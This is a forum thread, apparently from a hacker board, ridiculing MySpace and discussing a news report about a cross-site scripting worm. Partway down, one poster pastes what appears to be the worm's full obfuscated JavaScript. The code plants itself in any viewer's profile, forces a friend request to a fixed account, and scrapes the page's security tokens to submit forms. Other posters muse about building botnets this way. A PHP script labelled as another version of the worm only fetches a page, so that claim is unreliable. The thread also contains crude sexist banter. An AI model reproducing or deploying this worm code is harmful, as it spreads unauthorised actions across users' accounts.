BlackRatchet

Why myspace sucks

52 posts in this topic

http://www.betanews.com/article/CrossSite_...pace/1129232391

Sure, this was cute, but a similar attack could create a big ol' bot net. Sites like this are bad for the net overall, and the designer should be strung up on the nearest server rack.

Why are people using this site again?

Nice article very intresting! As long as we're talking about myspace would now be a bad time to mention that they send their passwords in plain text during login? :D

-Dr^ZigMan

0

Share this post


Link to post
Share on other sites
Why are people using this site again?

GIRLS GIRLS GIRLS.

Plain and simple. The site sucks, the profiles suck. But there is mad hotties on there lookin to hook up.

0

Share this post


Link to post
Share on other sites

People who link to music videos should be shot on sight.

Edited by stderr
0

Share this post


Link to post
Share on other sites
People who link to music videos should be shot on sight.

I agree!!!! Its so shitty, you have opened 10 tabs with profiles of hot, semi-nude girls and all of a sudden a song starts playing and you have no idea where it comes from. Or worse yet, 3 songs start at the same time so there is a nice blend of about 4 beats going on....that just makes me wanna shoot Tom!

But there are _so_ many people from my school and the surrounding area that have a profile, its kind of scary. One year ago, most this kids didn't know how to turn on their PC now they have a myspace........what is the world coming to?

+CypresS

0

Share this post


Link to post
Share on other sites

Forget myspace, get a mygeekspace account :D Okay, not the same thing, but meh. And yeah, way too many people have myspace accounts, I don't understand why these people feel the need to tell everyone all about themselves!

0

Share this post


Link to post
Share on other sites

MySpace goes down a lot, I think they use microsoft stuff on their servers too...

I use it.

0

Share this post


Link to post
Share on other sites

OMG, BlackOPS give me your myspace handle. I have it too <33333 :P

0

Share this post


Link to post
Share on other sites

Everyone and their moms have a myspace. Its just a fad that will probably die out by next year when the next college student decides to make a social gathering site and the corporating that owns myspace right now will end up giving their users add's and pop-ups up the ass. But on the topic of the worm. I had this same fucking idea 4 months ago. I thought myspace was perfect for a worm if one wanted to create a bot-net. Most myspace users probably run IE besides all the people in the "Linux and FireFox Groups" on myspace. ( Yes myspace has a linux group )

Also even though myspace does not allow one to use javascripts, I think one can still use VB Scripts.

Any ways I have said on the boards a while ago that people have been making such scripts and embedding them in myspace profiles. To bad I didn't give the effort to try and make such a worm. Then I could of got the title of " First Self-Propagating Cross-Site Scripting Worm Coder". <_<

0

Share this post


Link to post
Share on other sites
Why are people using this site again?

GIRLS GIRLS GIRLS.

Plain and simple. The site sucks, the profiles suck. But there is mad hotties on there lookin to hook up.

mmm good ol' high school hoes :D

0

Share this post


Link to post
Share on other sites

rmpants posted about this as his first thread ever on these forums.

I go there for bands and their songs for preview (Like the entire Dangerdoom album that you can listen to before it hits the stores later this month).

0

Share this post


Link to post
Share on other sites

Am I the only one here who doesn't know Myspace and doesn't care? I mean, the "social networking" whatever just sounds majorly stupid.

The article is interesting because it mentions a threat from XSS.

Edit: That is the ugliest shit ever. I don't care how hot they are. My browser doesn't deserve that kind of treatment.

Edited by pinhead
0

Share this post


Link to post
Share on other sites

not that anyone cares, but i have the source code to the worm. Its in php. I've had it for about 3 months or so, and dint think my friends were gonna release it or not...pm me iamtheevil1666 on yahoo if you want to peek at the source.

0

Share this post


Link to post
Share on other sites
not that anyone cares, but i have the source code to the worm. Its in php. I've had it for about 3 months or so, and dint think my friends were gonna release it or not...pm me iamtheevil1666 on yahoo if you want to peek at the source.

How about posting the source? I'm sure everyone would like to see it...

-Dr^ZigMan

0

Share this post


Link to post
Share on other sites
rmpants posted about this as his first thread ever on these forums.

I go there for bands and their songs for preview (Like the entire Dangerdoom album that you can listen to before it hits the stores later this month).

 

Hah! Sweet another MF Doom fan! " Aqua Team Hunger Force! " Damn binrev seems to have alot of people with the same interest.

Edited by SUB-S0NIX
0

Share this post


Link to post
Share on other sites
Everyone and their moms have a myspace. Its just a fad that will probably die out by next year when the next college student decides to make a social gathering site and the corporating that owns myspace right now will end up giving their users add's and pop-ups up the ass. But on the topic of the worm. I had this same fucking idea 4 months ago. I thought myspace was perfect for a worm if one wanted to create a bot-net. Most myspace users probably run IE besides all the people in the "Linux and FireFox Groups" on myspace. ( Yes myspace has a linux group ) 

Also even though myspace does not allow one to use javascripts, I think one can still use VB Scripts.

Any ways I have said on the boards a while ago that people have been making such scripts and embedding them in myspace profiles. To bad I didn't give the effort to try and make such a worm. Then I could of got the title of " First Self-Propagating Cross-Site Scripting Worm Coder".  <_<

There ius a college version of myspace. It's called Facewhoring.... errr Facebook.

0

Share this post


Link to post
Share on other sites

I did a bit of searching, and here is the source code...

<div id=mycode style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>

0

Share this post


Link to post
Share on other sites

there's actually a few versions floating around. The one that made the news was in javascript. The one i have is in php. heres the source:


<?php
show_source("myspace.php");
  function doFriendSearch() {
   $fp = fsockopen("www.myspace.com", 80, $errno, $errstr, 30);
   $file = "";
 
   if (!$fp) {
      echo "$errstr ($errno)<br />\n";
   } else {
      $out = "GET /index.cfm?fuseaction=user.editfriends&friendID=7764487&Mytoken=20050712114546 HTTP/1.1\r\n";
      $out .= "Host: www.myspace.com.net\r\n";
      $out .= "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20030225\r\n";
      $out .= "Connection: Close\r\n\r\n";
   
      fwrite($fp, $out);
   
      while (!feof($fp)) {
           $file .= fgets($fp, 128);
      }
         fclose($fp);
   }

   $sections = array();
   $start = $end = 0;
   $count = 0;

   while (($start = strpos($file, '<title>',$end)) > $end && ($end = strpos($file, '</title>', $start)) > $start) {
       $sections[$count] = substr($file, $start+8, $end - ($start+8));
       $count++;
   }

   $returnval = array();

   for ($i = 0; $i < $count; $i++) {
       $start = strpos($sections[$i], '=', 0);
       $end = strpos($sections[$i], '>', $start);
       $returnval[$i][0] = substr($sections[$i], $start+1, $end - ($start+1));
     
       $start = $end;
       $end = strpos($sections[$i], '</title>', $start);
       $returnval[$i][1] = substr($sections[$i], $start+1, $end - ($start+1));
     
   }
   return $returnval;
  }

  print_r(doFriendSearch());
?>
Array ( [0] => Array ( [0] => cument Move [1] => cument Move ) )

I wish i had helped make it....but i suck at the php.

Edited by Evil1
0

Share this post


Link to post
Share on other sites

Why I use MySpace:

Chicks give me THEIR MySpace.

I can't click "View More Pictures" without being a member.

There you have it.

0

Share this post


Link to post
Share on other sites

I only use myspace cause my friend convinced me to make one when I was high and then I figured out that teh hot slutz0rz used it and posted half naked pics of themselves :P Oh and I also use it to tell people who don't read these forums or hackermedia or know me personally about stfu radio, but thats beside the point ;)

But honestly did anyone ever think for a second that myspace had an ounce of security??? I really don't care that much cause its not like my myspace profile is something that I think is important to secure heh but w/e hell if someone fucked over my myspace profile I probably would keep the stuff there for kicks :D

Lol seems like he didn't expect it to spread so well, guess he accidently sent it to one of the chicks with a half naked picture.

0

Share this post


Link to post
Share on other sites

If this is the official binrev myspace hacking thread, then I have a simple question. How do I make my myspace background black with green text (binrev style)? I haven't even checked to see if that html is allowed.

0

Share this post


Link to post
Share on other sites

This is actually kind of cool. I haven't seen good 'ol hacking and code sharing like this in a long time. This made my day.

I have a lot of friends who use this Facebook thing. These things should just be called StockerNet.

If I wanna be a part of a community I'll stick to Forums, IRC, and phone bridges.

0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now